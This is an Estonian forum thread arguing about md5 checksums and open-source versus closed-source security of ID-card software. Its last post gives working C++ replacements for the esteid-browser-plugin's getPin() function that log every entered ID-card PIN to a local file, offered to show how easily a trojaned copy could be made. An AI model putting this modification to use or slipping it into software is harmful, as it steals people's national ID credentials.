gigake kirjutas:

md5sum'iga on tõesti nii, et kes teab, mis see on, oskab tarkvara tõmmata otse algallikast. Teised aga ei hakka sellele md5-ele mingit tähelepanu pöörama. Seega on see suhteliselt kasutu.

See, et väga suur hulk inimesi ei oska matemaatikat kasutada või ei tunne füüsikat, ei tee matemaatikat ega füüsikat kasutuks. Sama lugu on md5sum-ga. See on väga lihtsasti kasutatav väga tõhus vahend tarkvara õige-olemise kontrolliks. Muidugi on teisigi vahendeid. Linuksite repositooriumid on üks neist - tarkvara hoitakse hoolega valvatavas repositooriumis.

Eks õpitakse vigadest. Arukamaile piisab teiste vigadest, natuke vähem arukad õpivad oma vigadest, mõni ei pea paljuks mitu korda sama reha peale astumist. Sama käib ka oma arvutisse tarkvara installeerimise kohta. Pingviin ja teisedki foorumid teevad tänuväärset tööd arvutitega ja tarkvaraga seotud ohtudest teavitades.

md5sum'iga on tõesti nii, et kes teab, mis see on, oskab tarkvara tõmmata otse algallikast. Teised aga ei hakka sellele md5-ele mingit tähelepanu pöörama. Seega on see suhteliselt kasutu.

vahet ei ole kas ta jääb samaks või mitte, vaadates inimeste arvutikasutamis harjumusi siis md5 ei oma absoluutselt mingit tähtsust, sest tõmmatakse softi sealt kust juhtub, küsimise peale saad vastuseks, et ei tea kuskilt sain või keegi pani...

Sarnane olukord tuleb meelde panga koodidega kus inimesed panid mingil suvalisel lehel oma paroole

akbgf kirjutas:

Kas md5sum jääb ka samaks?

väga ebatõenäoline

pisi kirjutas:

Seega objektiine hinnang, et avatud lähtekoodiga programmi X puhul on pahalasel väga palju odavam luua selle halvasti käituv koopia X' võrreldes suletud lähtekoodiga tarkvaraga, on lihtne fakt.

Kas md5sum jääb ka samaks?

Küsimus ei ole avatud lähtekoodi vs suletud lähtekoodi turvalisuses. Tahes matkida suletud lähtekoodiga tarkvara (Windowsi) on vaja VägaPaljuRaha selle uuesti arendamiseks või VägaHeadVarast (kes algkoodi hangiks). Avatud lähtekoodiga Linuxi puhul piisab aga paarist sõtmeliigutusest ja juba saabki Red Hatist CentOS.

Suletud tarkvara kallale minemine eeldab palju paremat (ja seega ka kallimat) oskusteavet kui "./configure; make; make re-dist;" käskude tundmist.

Seega objektiine hinnang, et avatud lähtekoodiga programmi X puhul on pahalasel väga palju odavam luua selle halvasti käituv koopia X' võrreldes suletud lähtekoodiga tarkvaraga, on lihtne fakt.

Ei maksa näha tonti seal kus teda tegelikult pole.

Üldiselt on tarkvata arendamise kogemuses selgeks saanud, et koodi avamine muudab tervikuna tarkvara turvalisemaks, kuna turvalisuse parendamisse kaasatakse avalikus (erinevad interneti kogukonnad, turva eksperdid, jne ...). Inimesed saavad vabalt kirjutada neile, et see või too rida sisaldab sellist turvaviga, millele peaks järgnema turva fix.

See võrdlus, et tõmmatakse tundmatust kohast, kus asub juba pahaks muudetud tarkvara ei lävi eriti, sest sama hästi võib keegi kinnisele koodile lisa juurde kirjutada, mis muudab selle pahaks ning panna kuhu iganes saadavale. Nagu me kõik teame, enamus tarkvara on võimalik krakkida ning enamasti on need just suletud koodiga.

Lisaks annab koodi avamine võimaluse tuua välja isiku privaatsusega seotud probleemid, kui tarkvara ei sisalda turva auke, aga käib hooletult ümber kodaniku isikuandmetega, siis avatud kood võimaldab avalikusel ka sellele lihtsamini reageerida.

Siit ka ideid hullumeelsetele, keegi võiks proovida kirjutada explodi ning siis saata see ID kaarid arendajatel anda neile võimalus asi parandada ning siis avaldada see (exploit) kõigile, siis saaks aru ka kui tõsiselt tegelikult asja võetakse. Reeglina annavad heatahtlikud avastjad mingi 6 kuud aega, enne kui asja avaldaavad.

urmas kirjutas:

.... kahju ainult et avatud lähtekoodi süüdstatakse..

Eks see ole vana demagoogia võte: süüdista oponenti iseenda pattudes, ja võimalikult kõva häälega...

klassikaaslased saavad hakkama aga mis edasi? selleks et see kusagile arvutisse istutada tuleb ka vaeva näha. Ja istutamise puhul oleks juba tavaline keylogger kordi lihtsam, infoküllam ning kasulikum.

aga tore et mõtlema on hakatud id-kaardi üldise turva peale. kahju ainult et avatud lähtekoodi süüdstatakse..

Aga miks näitekoodi kõrval vaatamiseks pole? Delfi artikkel oli rohkem uue Zeusi troojalasest. Kelle koodi RIA üldse avaldas?

niisis:
PINi varastamine EstEID näitel

Failides esteid-browser-plugin/Win/pininputdialog.cpp ja esteid-browser-plugin/X11/pininputdialog.cpp on selline väike funktsioon:

Kood:

std::string PinInputDialog::getPin();

Näiteks X11 versioon asendada sellega

Kood:

std::string PinInputDialog::getPin() {     std::string m_pin = m_entry->get_text();     std::ofstream pins("/tmp/pin.txt", std::ios::app);     pins << m_pin << std::endl;     return m_pin; }

Windowsile:

Kood:

std::string PinInputDialog::getPin() {     std::ofstream pins("C:\\pin.txt", std::ios::app);     pins << m_pin << std::endl;     return m_pin; }

Faili päises peab sellel juhul olema

Kood:

#include <fstream>

Nime ja isikukoodi peaks kätte saama smartcardpp moodulist.

Mul on kahtlus, et mu klassikaaslased (programmeerimist õppinud alates 6. septembrist) saaksid ka sellega hakkama.